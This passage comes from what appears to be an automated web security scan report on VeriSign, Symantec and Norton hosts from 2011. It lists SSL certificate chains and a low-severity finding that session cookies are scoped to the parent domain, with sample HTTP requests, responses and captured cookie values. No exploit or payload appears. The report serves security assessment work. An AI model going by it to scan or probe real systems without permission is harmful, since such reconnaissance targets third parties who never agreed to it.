Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.30. https://test-products.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://test-products.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	test-products.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Sun Nov 07 18:00:00 GMT-06:00 2010
Valid to:	Wed Nov 07 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.31. https://vipdeveloper.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipdeveloper.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipdeveloper.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed Mar 17 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 17 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.32. https://vipmanager.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmanager.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipmanager.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Sun Mar 07 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.33. https://vipmobile.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipmobile.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Dec 12 18:00:00 GMT-06:00 2010
Valid to:	Wed Dec 12 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.34. https://vs.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vs.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vs.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:	Thu Jun 27 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.35. https://www-secure.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www-secure.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Fri Oct 08 18:00:00 GMT-06:00 2010
Valid to:	Mon Oct 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.36. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue May 25 18:00:00 GMT-06:00 2010
Valid to:	Fri May 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.37. https://www4.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www4.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www4.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Nov 18 18:00:00 GMT-06:00 2010
Valid to:	Sat Nov 19 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain previous next
There are 82 instances of this issue:

http://buy.norton.com/
http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
http://buy.norton.com/estore/mf/landingProductFeatures
http://buy.norton.com/estore/mf/landingPromotion
http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
http://buy.norton.com/estore/mf/upgradeCenter
http://buy.norton.com/estore/mf/upgradeRenewal
http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://buy.norton.com/
http://buy.norton.com/ps
http://buy.norton.com/special-promotions
http://buy.norton.com/support
http://buy.norton.com/upgrades-renewals
http://buy.symanteccloud.com/freetrial
http://buy.symanteccloud.com/smbstore
http://free.pctools.com/res/js/utils.php
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/71097838/
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/favicon.ico
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/redirect
https://trust-center.verisign.com/process/retail/session_timeout
https://trust-center.verisign.com/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_product_selector
https://trust-center.verisign.com/process/retail/trust_product_selector.do
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
https://trust-center.verisign.com/rcm/verisign/images/divider.gif
https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
https://trust-center.verisign.com/rcm/verisign/images/logo.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
https://trust-center.verisign.com/rcm/verisign/images/truste.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
https://trust-center.verisign.com/rcm/verisign/scripts/default.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
http://www.verisign.co.uk/hp07/i/vlogo.gif
https://www.verisign.com/assets/visual-sciences/vip/zig.js

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://buy.norton.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.6. http://buy.norton.com/estore/mf/landingProductFeatures previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...

9.7. http://buy.norton.com/estore/mf/landingPromotion previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
